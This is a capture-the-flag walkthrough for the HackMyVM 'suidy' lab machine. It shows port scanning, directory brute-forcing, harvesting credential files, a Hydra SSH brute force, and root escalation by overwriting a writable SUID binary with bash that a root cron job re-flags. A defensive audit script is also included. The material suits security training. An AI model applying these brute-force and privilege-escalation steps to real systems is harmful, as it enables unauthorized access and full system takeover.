HackmyVM-suidy


Information Gathering

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:de:a5:1f PCS Systemtechnik GmbH
192.168.31.181 08:00:27:86:a5:04 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.442 seconds (104.83 hosts/sec). 3 responded

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# rustscan -a 192.168.31.181 -r 1-65535

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 192.168.31.181:22
Open 192.168.31.181:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 09:10 EDT
Initiating ARP Ping Scan at 09:10
Scanning 192.168.31.181 [1 port]
Completed ARP Ping Scan at 09:10, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:10
Completed Parallel DNS resolution of 1 host. at 09:10, 0.02s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 09:10
Scanning 192.168.31.181 [2 ports]
Discovered open port 22/tcp on 192.168.31.181
Discovered open port 80/tcp on 192.168.31.181
Completed SYN Stealth Scan at 09:10, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.31.181
Host is up, received arp-response (0.00051s latency).
Scanned at 2025-05-10 09:10:36 EDT for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:86:A5:04 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

External Foothold

Directory Brute-Forcing

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# gobuster dir -u "http://192.168.31.181/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.181/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 22]
/robots.txt (Status: 200) [Size: 362]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================

robots.txt contains a Morse code message; decoded, it reads HIAGAIN.

There is also a directory, /shehatesme, hidden in very small text at the very bottom of the page:

She hates me because I FOUND THE REAL SECRET! I put in this directory a lot of .txt files. ONE of .txt files contains credentials like "theuser/thepass" to access to her system! All that you need is an small dict from Seclist!

Continue brute-forcing this directory:

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# gobuster dir -u "http://192.168.31.181/shehatesme/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.181/shehatesme/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/full.txt (Status: 200) [Size: 16]
/about.txt (Status: 200) [Size: 16]
/search.txt (Status: 200) [Size: 16]
/privacy.txt (Status: 200) [Size: 16]
/blog.txt (Status: 200) [Size: 16]
/new.txt (Status: 200) [Size: 16]
/page.txt (Status: 200) [Size: 16]
/forums.txt (Status: 200) [Size: 16]
/jobs.txt (Status: 200) [Size: 16]
/other.txt (Status: 200) [Size: 16]
/welcome.txt (Status: 200) [Size: 16]
/admin.txt (Status: 200) [Size: 16]
/faqs.txt (Status: 200) [Size: 16]
/2001.txt (Status: 200) [Size: 16]
/link.txt (Status: 200) [Size: 16]
/space.txt (Status: 200) [Size: 16]
/network.txt (Status: 200) [Size: 16]
/google.txt (Status: 200) [Size: 16]
/folder.txt (Status: 200) [Size: 16]
/java.txt (Status: 200) [Size: 16]
/issues.txt (Status: 200) [Size: 16]
/guide.txt (Status: 200) [Size: 16]
/es.txt (Status: 200) [Size: 16]
/art.txt (Status: 200) [Size: 16]
/smilies.txt (Status: 200) [Size: 16]
/airport.txt (Status: 200) [Size: 16]
/secret.txt (Status: 200) [Size: 16]
/procps.txt (Status: 200) [Size: 16]
/pynfo.txt (Status: 200) [Size: 16]
/lh2.txt (Status: 200) [Size: 16]
/muze.txt (Status: 200) [Size: 16]
/alba.txt (Status: 200) [Size: 16]
/cymru.txt (Status: 200) [Size: 16]
/wha.txt (Status: 200) [Size: 16]

Then tidy up the results, save them, and fetch every file:

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# grep '.*\.txt' pass -o>pass.txt
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# for i in $(cat pass.txt);do curl "http://192.168.31.181/shehatesme$i";done
yuijhse/hjupnkk
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
hidden1/passZZ!
jhfbvgt/iugbnvh
john765/FDrhguy
maria11/jhfgyRf
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
mmnnbbv/iughtyr
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
smileys/98GHbjh
nhvjguy/kjhgyut
jaime11/JKiufg6
theuser/thepass
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6

SSH Login

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# awk -F'/' '{print $1}' 2 >>user
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# awk -F'/' '{print $2}' 2 >>pass.txt
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# hydra -C 3 192.168.31.181 ssh -vV -f -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-10 09:30:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 34 login tries, ~3 tries per task
[DATA] attacking ssh://192.168.31.181:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
....
[22][ssh] host: 192.168.31.181 login: theuser password: thepass
[STATUS] attack finished for 192.168.31.181 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-10 09:30:26

Log in with theuser:thepass.

Privilege Escalation to ROOT

theuser@suidy:~$ sudo -l
-bash: sudo: orden no encontrada

Nothing to be had from sudo; it is not even installed.

theuser@suidy:~$ find / -perm -u=s 2>/dev/null
/home/suidy/suidyyyyy
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device

The SUID search turns up suidyyyyy; running it gives the privileges of the user suidy directly. Check its permissions:

theuser@suidy:/home/suidy$ ls -ll
total 24
-r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
-rwsrwsr-x 1 root theuser 16704 sep 26 2020 suidyyyyy

Open it in IDA to take a look (decompiled main, with comments added):

#include <stdlib.h>
#include <unistd.h>

int main(int argc, const char **argv, const char **envp)
{
    /* 0x3E9 == 1001, the uid/gid of suidy (see the /etc/passwd dump below),
       so the binary drops from root to suidy before spawning a shell. */
    setuid(0x3E9u);
    setgid(0x3E9u);
    system("/bin/bash");
    return 0;
}

Upload pspy to monitor processes:

2025/05/10 15:52:01 CMD: UID=0     PID=711    | sh /root/timer.sh

There is a timer.sh run by root. A blind guess: it probably re-applies the SUID bit to whatever suidyyyyy we put there. Overwrite the file with an arbitrary copy (cp) and wait a while:

theuser@suidy:/home/suidy$ cat suidyyyyy
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
theuser:x:1000:1000:theuser,,,:/home/theuser:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
suidy:x:1001:1001:,,,:/home/suidy:/bin/bash
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
theuser@suidy:/home/suidy$ ls -ll
total 8
-r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
-rwsrwsr-x 1 root theuser 1445 may 10 15:53 suidyyyyy
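As an added defensive check, not part of the original writeup: a POSIX sh audit that flags exactly the weakness exploited here, a setuid file that someone other than its owner can overwrite. The script name suidaudit.sh in the usage comment is a hypothetical.

```shell
#!/bin/sh
# Added audit helper (not from the original writeup): flag set-uid files that
# a non-owner could overwrite. On the suidy box, suidyyyyy was root-owned with
# mode -rwsrwsr-x and group theuser, so any member of that group could replace
# the binary while a root cron job kept re-applying the SUID bit.

# Return 0 when FILE is setuid and group- or world-writable, 1 otherwise.
# Parses the ls -l mode string so it works with GNU and BSD userlands:
#   -rwsrwsr-x  -> pos 4 = 's'/'S' (setuid), pos 6 / pos 9 = 'w' (g/o write)
is_writable_suid() {
    f="$1"
    [ -f "$f" ] || return 1
    mode=$(ls -ld -- "$f" | cut -c1-10)
    case "$mode" in
        ???[sS]?w????|???[sS]????w?) return 0 ;;
    esac
    return 1
}

# Walk ROOT (default /) on one filesystem and print "mode owner:group path"
# for every offending file; permission errors (e.g. under /proc) are silenced.
scan_writable_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 \
         \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null |
    while IFS= read -r f; do
        info=$(ls -ld -- "$f" | awk '{print $1, $3 ":" $4}')
        printf '%s %s\n' "$info" "$f"
    done
}

# Usage (hypothetical file name): . ./suidaudit.sh && scan_writable_suid /
```

Any hit owned by root is a privilege-escalation path of the kind shown on this box; the fix is to remove write access for group/other (chmod g-w,o-w) and to stop any cron job from chmod-ing files under user-writable directories.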

The guess was correct. Now copy bash over it, wait for the cron job to re-apply the SUID bit, and run it with -p so bash keeps the effective uid:

theuser@suidy:/home/suidy$ cp /bin/bash ./suidyyyyy
theuser@suidy:/home/suidy$ ./suidyyyyy -p
suidyyyyy-5.0#
suidyyyyy-5.0# id
uid=1000(theuser) gid=1000(theuser) euid=0(root) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)